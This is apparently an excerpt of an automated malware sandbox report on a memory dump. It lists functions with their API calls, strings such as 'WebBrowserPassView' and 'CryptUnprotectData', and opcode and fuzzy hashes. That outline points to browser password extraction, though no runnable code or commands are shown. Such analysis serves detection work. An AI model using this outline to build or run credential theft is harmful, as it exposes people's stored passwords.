                                                                                                                                                                  • Instruction ID: 334aba75e86a29cb8f13e765f22732fbee0fc66aecb0188c901082e5a368eb6e
                                                                                                                                                                  • Opcode Fuzzy Hash: 6c1110d14c1add4ef8e68146380b3aae4225835160ec4e19b547157684646b60
                                                                                                                                                                  • Instruction Fuzzy Hash: 6C01DFB2A402197BE710A759CC41FAA776DEF44744F1440B7B60CF3141D7389E458799
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00408806, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: wcscat$_snwprintfmemset
                                                                                                                                                                  • String ID: %2.2X
                                                                                                                                                                  • API String ID: 2521778956-791839006
                                                                                                                                                                  • Opcode ID: 5a064a07adf84ed7b2831601ac1f3950ee49257a2339621e3ef87230185a7937
                                                                                                                                                                  • Instruction ID: 7e3155c1ee39ddc5e1c88fc61abef366a99ea1f709d40badb718d03975286e65
                                                                                                                                                                  • Opcode Fuzzy Hash: 5a064a07adf84ed7b2831601ac1f3950ee49257a2339621e3ef87230185a7937
                                                                                                                                                                  • Instruction Fuzzy Hash: 8F012873D4031866F734E7519C46BBA33A8AB81B18F11403FFC54B51C2EA7CDA4446D8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00443C91, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • wcscpy.MSVCRT ref: 00443CA6
                                                                                                                                                                  • wcscat.MSVCRT ref: 00443CB5
                                                                                                                                                                  • wcscat.MSVCRT ref: 00443CC6
                                                                                                                                                                  • wcscat.MSVCRT ref: 00443CD5
                                                                                                                                                                  • VerQueryValueW.VERSION(?,?,00000000,?), ref: 00443CEF
                                                                                                                                                                    • Part of subcall function 0040807E: wcslen.MSVCRT ref: 00408085
                                                                                                                                                                    • Part of subcall function 0040807E: memcpy.MSVCRT ref: 0040809B
                                                                                                                                                                    • Part of subcall function 00408148: lstrcpyW.KERNEL32 ref: 0040815D
                                                                                                                                                                    • Part of subcall function 00408148: lstrlenW.KERNEL32(?), ref: 00408164
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: wcscat$QueryValuelstrcpylstrlenmemcpywcscpywcslen
                                                                                                                                                                  • String ID: \StringFileInfo\
                                                                                                                                                                  • API String ID: 393120378-2245444037
                                                                                                                                                                  • Opcode ID: 9500244735cad2a77f643a6d996c161e8bec2251a1074d797bccc37d017a6394
                                                                                                                                                                  • Instruction ID: 4bcd922806ee50f9cb47b7d9b2cc513868d30f54de93413914084f8cb2eb3ca3
                                                                                                                                                                  • Opcode Fuzzy Hash: 9500244735cad2a77f643a6d996c161e8bec2251a1074d797bccc37d017a6394
                                                                                                                                                                  • Instruction Fuzzy Hash: B801847290020DA6EF11EAA1CC45EDF777CAB44308F1005B7B654F2052EA3CDB869B58
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040B7A3, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _snwprintfwcscpy
                                                                                                                                                                  • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                                                                  • API String ID: 999028693-502967061
                                                                                                                                                                  • Opcode ID: 167585e561b408c48eaedfed01294a32f4914c684c08b453e3d5971788cf8a7a
                                                                                                                                                                  • Instruction ID: fa5e8ebf88800a0e12fd117f624f479e56397311d80730f797776366f89ad5f2
                                                                                                                                                                  • Opcode Fuzzy Hash: 167585e561b408c48eaedfed01294a32f4914c684c08b453e3d5971788cf8a7a
                                                                                                                                                                  • Instruction Fuzzy Hash: 9FE086717C830031FE1115511E83F162150C6E5F95FB1046BF505B16D2DB7D8864668F
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0042A67D, Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 217COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memset
                                                                                                                                                                  • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                                                                                  • API String ID: 2221118986-1606337402
                                                                                                                                                                  • Opcode ID: 8c8ae128e2328f7302dbfa3f65ab71e8e651d3896b870492eb27771cacaf7654
                                                                                                                                                                  • Instruction ID: c7fea52ce07df1abaedfaf21b9d509cbcb108d5d19e9a81960d934b60e9c5d67
                                                                                                                                                                  • Opcode Fuzzy Hash: 8c8ae128e2328f7302dbfa3f65ab71e8e651d3896b870492eb27771cacaf7654
                                                                                                                                                                  • Instruction Fuzzy Hash: 6A818D70A083219FDB10DF15E48161BB7E0AF94324F59885FEC859B252D378EC95CB9B
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00413117, Relevance: 9.1, APIs: 6, Instructions: 141COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,004115CD,00000000,00000000), ref: 00413152
                                                                                                                                                                  • memset.MSVCRT ref: 004131B4
                                                                                                                                                                  • memset.MSVCRT ref: 004131C4
                                                                                                                                                                    • Part of subcall function 00413031: wcscpy.MSVCRT ref: 0041305A
                                                                                                                                                                  • memset.MSVCRT ref: 004132AF
                                                                                                                                                                  • wcscpy.MSVCRT ref: 004132D0
                                                                                                                                                                  • CloseHandle.KERNEL32(?,004115CD,?,?,?,004115CD,00000000,00000000), ref: 00413326
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3300951397-0
                                                                                                                                                                  • Opcode ID: f89de95a6920a90433c065a9965a4fcf749ac6404f68e573733b6ce647e0e13f
                                                                                                                                                                  • Instruction ID: cefdbdf849389f09311ea621c5a87f262da3bfb792e558c61850347b92c9bf04
                                                                                                                                                                  • Opcode Fuzzy Hash: f89de95a6920a90433c065a9965a4fcf749ac6404f68e573733b6ce647e0e13f
                                                                                                                                                                  • Instruction Fuzzy Hash: 0D514971108344AFD720DF65CC88A9BB7E8FB84306F404A2EF99982251DB74DA44CB6A
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00417EE5, Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 00417F17
                                                                                                                                                                  • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 00417F25
                                                                                                                                                                  • free.MSVCRT(00000000), ref: 00417F6B
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AttributesFilefreememset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2507021081-0
                                                                                                                                                                  • Opcode ID: 589a6b9333c77986f3b6355c6ce351534fc2f1959dd785c0c1c88223f13a717d
                                                                                                                                                                  • Instruction ID: b8dc40b53dc963fdbe0ae3b1e60dcad109612476599bdcfb1117a2ceff08efc0
                                                                                                                                                                  • Opcode Fuzzy Hash: 589a6b9333c77986f3b6355c6ce351534fc2f1959dd785c0c1c88223f13a717d
                                                                                                                                                                  • Instruction Fuzzy Hash: 0811B73690C1159B9B109F649CC15EF7278DB49354B21013BF912A2281D63C9D82D2AD
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040EF2B, Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 78COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 0040EF4D
                                                                                                                                                                    • Part of subcall function 0040B301: GetModuleHandleW.KERNEL32(00000000,?,?,0040C3FA,?,0040FE90,00000000,00000000,?), ref: 0040B340
                                                                                                                                                                    • Part of subcall function 0040B301: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040B3D9
                                                                                                                                                                    • Part of subcall function 0040B301: memcpy.MSVCRT ref: 0040B419
                                                                                                                                                                    • Part of subcall function 0040B301: wcscpy.MSVCRT ref: 0040B382
                                                                                                                                                                    • Part of subcall function 0040B301: wcslen.MSVCRT ref: 0040B3A0
                                                                                                                                                                    • Part of subcall function 0040B301: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040C3FA,?,0040FE90,00000000,00000000,?), ref: 0040B3AE
                                                                                                                                                                    • Part of subcall function 00408AE8: memset.MSVCRT ref: 00408B09
                                                                                                                                                                    • Part of subcall function 00408AE8: _snwprintf.MSVCRT ref: 00408B3C
                                                                                                                                                                    • Part of subcall function 00408AE8: wcslen.MSVCRT ref: 00408B48
                                                                                                                                                                    • Part of subcall function 00408AE8: memcpy.MSVCRT ref: 00408B60
                                                                                                                                                                    • Part of subcall function 00408AE8: wcslen.MSVCRT ref: 00408B6E
                                                                                                                                                                    • Part of subcall function 00408AE8: memcpy.MSVCRT ref: 00408B81
                                                                                                                                                                    • Part of subcall function 00408907: GetSaveFileNameW.COMDLG32(?), ref: 00408956
                                                                                                                                                                    • Part of subcall function 00408907: wcscpy.MSVCRT ref: 0040896D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memcpywcslen$HandleModulememsetwcscpy$FileLoadNameSaveString_snwprintf
                                                                                                                                                                  • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                                  • API String ID: 1392923015-3614832568
                                                                                                                                                                  • Opcode ID: e098a2b6de55531eea522cb88dcf061458ab68b85293c38f111b81194adb8019
                                                                                                                                                                  • Instruction ID: 893d8713e26b77edc4206c052df4fc7d3163be0104e9675467069f1f0f0c5c5e
                                                                                                                                                                  • Opcode Fuzzy Hash: e098a2b6de55531eea522cb88dcf061458ab68b85293c38f111b81194adb8019
                                                                                                                                                                  • Instruction Fuzzy Hash: 963150B1D006199FDB10EF96D8856DD7BB4FF04318F20417BF908B7281EB786A458B98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00416E10, Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • AreFileApisANSI.KERNEL32 ref: 00416E17
                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 00416E35
                                                                                                                                                                  • malloc.MSVCRT ref: 00416E3F
                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 00416E56
                                                                                                                                                                  • free.MSVCRT(?), ref: 00416E5F
                                                                                                                                                                  • free.MSVCRT(?,?), ref: 00416E7D
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4131324427-0
                                                                                                                                                                  • Opcode ID: ef1d8c4a491119e611ed89199fe48a787826ffdbe5a65be19b588c9cf178c72a
                                                                                                                                                                  • Instruction ID: 8f18c9831eb1c79f14fd8e789aed1b74bdecd3d50ffb4352c5f07f5f59d31971
                                                                                                                                                                  • Opcode Fuzzy Hash: ef1d8c4a491119e611ed89199fe48a787826ffdbe5a65be19b588c9cf178c72a
                                                                                                                                                                  • Instruction Fuzzy Hash: 4901FC7A504221BBAB215B75EC01EEF36DCDF457B07220326FC14E7290DA28DD4145EC
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00414CCE, Relevance: 9.0, APIs: 2, Strings: 4, Instructions: 21COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memcpy
                                                                                                                                                                  • String ID: NA$LMA$MMA$MMA
                                                                                                                                                                  • API String ID: 3510742995-965156261
                                                                                                                                                                  • Opcode ID: 55ac8c502bd4826d858cd5ef6fc5d691ccd3d3d57d4c1cb0b8c1e43a78ebe62b
                                                                                                                                                                  • Instruction ID: 8582fd1753a63c193c8d59700b7b4d4e45a0e47666d49b47a36a18adf3e061cc
                                                                                                                                                                  • Opcode Fuzzy Hash: 55ac8c502bd4826d858cd5ef6fc5d691ccd3d3d57d4c1cb0b8c1e43a78ebe62b
                                                                                                                                                                  • Instruction Fuzzy Hash: DBE09A30940350DAE360A744DC82F823294A742B26F11843BE508229E3C3FC98C88BAD
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00417AB2, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetTempPathW.KERNEL32(000000E6,?,?,0041767E), ref: 00417AF6
                                                                                                                                                                  • GetTempPathA.KERNEL32(000000E6,?,?,0041767E), ref: 00417B1E
                                                                                                                                                                  • free.MSVCRT(00000000,0044C838,00000000), ref: 00417B46
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: PathTemp$free
                                                                                                                                                                  • String ID: %s\etilqs_$etilqs_
                                                                                                                                                                  • API String ID: 924794160-1420421710
                                                                                                                                                                  • Opcode ID: ef23db0a414d9dcf011a3825053a170985a18b01ba0b77813df6364c9434a8ca
                                                                                                                                                                  • Instruction ID: 98cb418060ea171a52ad1c8f6cb6bf58db0dc7ae7347cd78cc57f1029aea62d9
                                                                                                                                                                  • Opcode Fuzzy Hash: ef23db0a414d9dcf011a3825053a170985a18b01ba0b77813df6364c9434a8ca
                                                                                                                                                                  • Instruction Fuzzy Hash: F8314B3160C2595AE730A7659C41BFB73AD9F6434CF2404AFE481C2182EF6CEEC58A5D
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040D5DA, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 0040D611
                                                                                                                                                                    • Part of subcall function 004147A8: memcpy.MSVCRT ref: 00414825
                                                                                                                                                                    • Part of subcall function 0040CDFA: wcscpy.MSVCRT ref: 0040CDFF
                                                                                                                                                                    • Part of subcall function 0040CDFA: _wcslwr.MSVCRT ref: 0040CE3A
                                                                                                                                                                  • _snwprintf.MSVCRT ref: 0040D65B
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                                                                                  • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                                  • API String ID: 1775345501-2769808009
                                                                                                                                                                  • Opcode ID: bd6149e99cc7a28de9a93ba740ac90c598832ca3e2003f992b14148a88f33169
                                                                                                                                                                  • Instruction ID: be7e472b8ae12577d0ef69e4d5a2bd87498dbd4f23eec6cc8c98af6d964d1ad5
                                                                                                                                                                  • Opcode Fuzzy Hash: bd6149e99cc7a28de9a93ba740ac90c598832ca3e2003f992b14148a88f33169
                                                                                                                                                                  • Instruction Fuzzy Hash: 3E11C13160031ABBEB11AB65CCC6E997B25FF08708F100026F809676A2C739F961DBC9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040F2F9, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 56COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 0040F329
                                                                                                                                                                    • Part of subcall function 00408282: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040BE8F,00000000,0040BD42,?,00000000,00000208,?), ref: 0040828D
                                                                                                                                                                  • wcsrchr.MSVCRT ref: 0040F343
                                                                                                                                                                  • wcscat.MSVCRT ref: 0040F35F
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                                                                                  • String ID: .cfg$General
                                                                                                                                                                  • API String ID: 776488737-1188829934
                                                                                                                                                                  • Opcode ID: 3c04ec66949ca4b58d7f719b2f0ee793d98d67a51e79d319996db7eeb5c734b3
                                                                                                                                                                  • Instruction ID: 56bea33938f28168157b0b8bcc93b38caa6b0521648f49714e8bc2d05d89a73e
                                                                                                                                                                  • Opcode Fuzzy Hash: 3c04ec66949ca4b58d7f719b2f0ee793d98d67a51e79d319996db7eeb5c734b3
                                                                                                                                                                  • Instruction Fuzzy Hash: 831186769013289ADF20EF55CC85ACE7378FF48754F1041FBE508A7142DB789A858B99
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040FBD2, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,00000000), ref: 0040FBF3
                                                                                                                                                                  • RegisterClassW.USER32 ref: 0040FC18
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040FC1F
                                                                                                                                                                  • CreateWindowExW.USER32 ref: 0040FC3E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                                                                                  • String ID: WebBrowserPassView
                                                                                                                                                                  • API String ID: 2678498856-2171583229
                                                                                                                                                                  • Opcode ID: 83b8f8d6c3154c4bdd4fc1cc3252cc631093d3cfb7f7179f48de14d9357ef2dd
                                                                                                                                                                  • Instruction ID: f352fd5291e0f9f707763c8e0c0f79a6b8b327092a808c719acfd4fe52221a97
                                                                                                                                                                  • Opcode Fuzzy Hash: 83b8f8d6c3154c4bdd4fc1cc3252cc631093d3cfb7f7179f48de14d9357ef2dd
                                                                                                                                                                  • Instruction Fuzzy Hash: 6E01C4B1D02629ABDB01DF998C89ADFBEBCFF09750F108116F514E6241D7B45A408BE9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00403BB9, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryW.KERNEL32(crypt32.dll,?,00000000,004027E9,?,00000090,00000000,?), ref: 00403BC8
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00403BDA
                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00403BFD
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                  • String ID: CryptUnprotectData$crypt32.dll
                                                                                                                                                                  • API String ID: 145871493-1827663648
                                                                                                                                                                  • Opcode ID: 5a4a0124d32878fe9075046ef856c222503c42c3ca474c9d5839c12a83985592
                                                                                                                                                                  • Instruction ID: 6d08c6472c4a7eef0e99d7de69836aa1542f25023555ecd08c966f49be56efdf
                                                                                                                                                                  • Opcode Fuzzy Hash: 5a4a0124d32878fe9075046ef856c222503c42c3ca474c9d5839c12a83985592
                                                                                                                                                                  • Instruction Fuzzy Hash: B3012C36508A419BDB318F168D4881BFEF9EFE1741B25482EE0C6E2261D7799980CB54
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0041409A, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • wcscpy.MSVCRT ref: 004140A9
                                                                                                                                                                  • wcscpy.MSVCRT ref: 004140C4
                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000000,00000000,0040F398,00000000,?,0040F398,?,General,?), ref: 004140EB
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,00000001), ref: 004140F2
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: wcscpy$CloseCreateFileHandle
                                                                                                                                                                  • String ID: General
                                                                                                                                                                  • API String ID: 999786162-26480598
                                                                                                                                                                  • Opcode ID: b82796398bdfff255fd1f18aa51d55e941ea69e93fc42597b2932e96296840f9
                                                                                                                                                                  • Instruction ID: 886da17c1b1bf2e9de85dc8b7e1e57be2bc6bdc909f117fec59c49a827307fb5
                                                                                                                                                                  • Opcode Fuzzy Hash: b82796398bdfff255fd1f18aa51d55e941ea69e93fc42597b2932e96296840f9
                                                                                                                                                                  • Instruction Fuzzy Hash: 6BF059B3408701AFF7209B919C85E9B7BDCEB98318F11842FF21991011DB384C4486A9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00407DF4, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetLastError.KERNEL32(00000000,?,0040DEA5,00000000,?,0040FF40,00000000,00000000,?,00000000,00000000,00000000), ref: 00407E08
                                                                                                                                                                  • _snwprintf.MSVCRT ref: 00407E35
                                                                                                                                                                  • MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00407E4E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastMessage_snwprintf
                                                                                                                                                                  • String ID: Error$Error %d: %s
                                                                                                                                                                  • API String ID: 313946961-1552265934
                                                                                                                                                                  • Opcode ID: a75c3089e7e966da0bd638cb6b9ab9d800269499d53a23e07f81a9ce3fd34d46
                                                                                                                                                                  • Instruction ID: b00963ac5392a62de3320d989648915026267cceceb2d36b0a398715d1e41bd5
                                                                                                                                                                  • Opcode Fuzzy Hash: a75c3089e7e966da0bd638cb6b9ab9d800269499d53a23e07f81a9ce3fd34d46
                                                                                                                                                                  • Instruction Fuzzy Hash: B9F0A77694060867EF11A794CC06FDA73ACBB84791F1400BBF945E2181DAB8EA854A69
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0041473D, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryW.KERNEL32(shlwapi.dll,73FB48C0,?,00404C4C,00000000), ref: 00414746
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 00414754
                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,00404C4C,00000000), ref: 0041476C
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                  • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                                                                  • API String ID: 145871493-1506664499
                                                                                                                                                                  • Opcode ID: 86042acc96e33f1a31b74afa18de2a5d13a01f1e05fbb0343d8f5c10d07cce3a
                                                                                                                                                                  • Instruction ID: 374e307410260eae357c848a0ac8b8d2ed108e4990ae0ebeecf0dac054c84ad8
                                                                                                                                                                  • Opcode Fuzzy Hash: 86042acc96e33f1a31b74afa18de2a5d13a01f1e05fbb0343d8f5c10d07cce3a
                                                                                                                                                                  • Instruction Fuzzy Hash: B1D05B397005206BEA5167366C48FEF3A55EFC7B517154031F910D2261DB648C0285AD
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004351F7, Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 390COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: foreign key constraint failed$new$oid$old
                                                                                                                                                                  • API String ID: 0-1953309616
                                                                                                                                                                  • Opcode ID: e023502b744750f4b23ffe04e2ae5b216edfebde367b4abfa2077d4614065f4c
                                                                                                                                                                  • Instruction ID: aa3871157cb2c29edb2d7db9a5a62b5d9e1ddd85e1ada7e098d24c65e5f6a169
                                                                                                                                                                  • Opcode Fuzzy Hash: e023502b744750f4b23ffe04e2ae5b216edfebde367b4abfa2077d4614065f4c
                                                                                                                                                                  • Instruction Fuzzy Hash: 60E1BF71E00209EFDB14DFA5D981AAEBBB5FF48304F10806AE805AB341DB78AD51CB95
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00430EBE, Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 230COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00430F42
                                                                                                                                                                  • unknown column "%s" in foreign key definition, xrefs: 004310A5
                                                                                                                                                                  • foreign key on %s should reference only one column of table %T, xrefs: 00430F1A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
